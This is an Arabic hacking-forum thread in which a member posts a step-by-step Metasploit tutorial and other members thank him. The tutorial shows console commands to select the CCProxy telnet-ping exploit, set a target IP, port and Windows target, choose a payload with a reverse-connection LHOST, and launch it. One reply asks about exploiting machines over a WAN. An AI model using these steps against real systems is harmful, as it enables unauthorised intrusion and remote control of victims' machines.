|
استخدام مشروع Metasploit و شرح استغلال ثغراته بالتفصيل السلام عليكم ورحمة الله وبركاته http://www.7ammil.com/data/visitors/...-framework.png اخواني الاعزاء اعضاء منتدى العناكب اقدم لكم شرح بسيط عن Metasploit وطرق استغلال ثغراته اخواني Metasploit يحتوي على الكثير من الثغرات وهو يعرض لك الثغره وطرق عديده للاستغلال وانت وشطارتك اخواني انا ما حبيت اني اعلمكم على طريقه واحده فقط انا ابي اعلمكم على الاساسيات في Metasploit علشان تبدأمن عندها الى الاحتراف باذن الله اخواني انا منزل الصور من مدونة اخوي العزيز::br4v3-h34r7 جزاه الله خير لاني ما اشتغل على جهازي يعني اكتب لكم هالشرح وانا على جهاز اخوي<<<ماشاء الله مسوي يمون على الجهاز والصراحه الموضوع يصلح اني احطه في قسم السيرفرت والاجهزه لان الطرق في المشروع للاثنين متشابهه نوعا ما والشائع في استخدامه للسيرفرات والمواقع اكثر منه على الاجهزه العاديه المهم ما ابي اطول عليكم يلااا نبدأ الشرح"" بدأ مشروع ثغرات Metasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع Metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا… لكل شيء محاسن و مساوء قوة مشروع ميتاسبلويت و سهولة استخدامه جعلت الكثيرين من الأطفال الذين يظنون أنفسهم Hackers يستخدمه لاختراق أجهزة الآخرين و التحكم بها بتنفيذ بضعة أوامر دون أي معرفة أو فهم بالثغرة, سببها, برمجتها أو حتى كيفية استغلاله نبدأ بفتح سطر الأوامر و من ثم الذهاب للمجلد الموجود به مشروع Metasploit بعد ذلك نقوم بتشغيل سطر أوامر مشروع Metasploit بتنفيذ الأمر: كود: msfconsole*ملاحظه الشرح على الينوكس وانا لا انصح باستخدامه على الويندوز. نكمل اول ما يبدا في التشغيل راح يعطينا تفاصيل عنه مثل الاصدار والثغرات الموجوده .....الخ لنتمكن من استغلال ثغرة Metasploit هنالك بضعة خطوات يجب القيام بها, تختلف هذه الخطوات و الخيارات من ثغرة لأخرى الا أنها متشابهة بشكل عام. أول شيء علينا تحديد الثغرة التي نريد استغلالها بعد ذلك نحدد الخيارات الخاصة بها مثل الاصدار المصاب, نظام التشغيل, الاستغلال… ثم ننفذ الثغرة و نستخدمها حسب الاستغلال المحدد في الخيارات, يوجد الكثير من الأوامر التي يمكننا استخدامها في مشروع ميتاسبلويت لمعرفتها نقوم بتنفيذ الأمر التالي:: كود: msf > helpما يهمنا حاليا في استغلال الثغرات هي الأوامر المظللة في الصورة وهي "show"&"info"&"use" نستخدم الأمر الأول لاظهار الثغرات الموجودة في المشروع أما الثاني لاظهار معلومات مفصلة عن الثغرة و مصادر خارجية عنها و الثالث لاستخدام الثغرة و تحديد خياراتها نبدا بالأمر الاول وهو "show" علشان نشوف الثغرات الموجوده بالأدات في اصح تعبير وعلشان ننفذ الامر في الاداة نكتب الامر هذا وبعدين نضغط انتر:: كود: msf > show exploitsكما هو واضح تم اظهار عدد كبير من الثغرات و بجانب كل ثغرة معلومات بسيطة عن البرنامج/النظام و الاصدار المصاب ولاظهار تفاصيل ثغرة معينه اكتب الامر"info" وبعده مسافه ويعده اسم الثغره اللي تبيها مثال على ذلك: كود: msf > info windows/proxy/ccproxy_telnet_pinghttp://www.7ammil.com/data/visitors/...-4-500x359.png قبل البدء باستخدام الثغرة نلاحظ الخيارات المتوفرة لها و كما قلت سابقا تختلف الخيارات من ثغرة لأخرى لكن في هذه الثغرة يوجد لدينا خيارين أساسيين الأول هو IP السيرفر الذي يستعمل برنامج CCProxy أما الثاني فهو المنفذ الذي يستخدمه البرنامج, أيضا لا ننسى تحديد النظام فهذا شيء مهم في ثغرات Metasploit خصوصا أنظمة Windows و اصداراتها و علينا معرفة أن استغلال هذه النوعية من الثغرات دقيق جدا و صعوبة استغلالها تكمن في دقتها فأي خيار خاطئ نحدده لن يمكننا من استغلال الثغرة بشكل صحيح الان ننفذ الامر"use" علشان نستخدم الثغره نكمل على مثالنا السابق كود: msf > use windows/proxy/ccproxy_telnet_pingنكمل و نستخدم الأمر show لاظهار خيارات الثغرة المتوفرة مثال:: كود: msf exploit(ccproxy_telnet_ping) > show optionshttp://www.7ammil.com/data/visitors/...-5-500x359.png في الصورة السابقه قمنا بتحديد اي بي المستهدف بالأمر"set" وبعده الخيار "RHOST" مثال:: كود: msf exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53كود: msf exploit(ccproxy_telnet_ping) > set RPORT 34كود: msf exploit(ccproxy_telnet_ping) > show targetsكود: msf exploit(ccproxy_telnet_ping) > set TARGET 4أما الآن نظهر الاستغلالات المتاحة لهذه الثغرة باستخدام الأمر: كود: msf exploit(ccproxy_telnet_ping) > show payloadsكود: msf exploit(ccproxy_telnet_ping) > show optionsيمكننا الأن تحديد خيارات الاستغلال مثل LHOST وهو IP جهازنا و LPORT هو المنفذ الذي سيتم الاتصال العكسي عن طريقه بتنفيذ الأمر كود: msf exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41كود: msf exploit(ccproxy_telnet_ping) > exploithttp://www.7ammil.com/data/visitors/...-9-500x359.png الواجهة الرسومية العادية GUI لتشغيلها ننفذ الأمر التالي داخل مجلد مشروع Metasploit كود: ./msfguiطولت عليكم اخواني اتمنى انكم استفدتوا من الشرح خير استفاد واتمنى انه واضح واعيد ما قلته انا نزلت الصور من مدونه اخوي::br4v3-h34r7 علشان ما يطلع لي واحد الحين ويقول اني ناقله اشكركم واتمنى لكم الصحه والعافيه اخوكم::wolf_112 |
نسيت لا احط لكم رابط تحميل الاداة خخخخخخخخخخخخخخخخ :d وتثبيتها سهل زي اي برنامج تثبته تفضلو www.metasploit.com اعذروني على الخطأ او الزلل |
مشكوووووووووور اخوي ذيب _ 112 |
مشكور حبيبي شرح رائع من شخص اروع بطل |
اشكركم اخواني ابو بدر & دوووم المتالق على مروركم الذي اسعدني وان شاء الله يدا بيد لنرتقي بالمنتدى |
شكرا لك شرح مميز تقبل احتراماتي |
اشكرك اخوي على المرور والرد الرائعين والى الامام |
Merci mon frère, une question svp , est se que le metaespaloit possèd des exploit sur WAN par ce qu je vois que la plus part des exploits marche sur LAN. merci. |
شرح رآئع ووآضح ~ مشكور حبيبي ماقصرت يالغلا ~ |
يعطيك العافية |
مشكووور |
مشكووور وما تقصر ونقدر جهودك الجبارة |
مشكوووورين على المرور والصراحه نورتو الموضوع |
مشكووور |
[align=center] مهكور يا الغلا وجارى التحميل [/align] |
| الساعة الآن 08:40 AM |
[ vBspiders.Com Network ]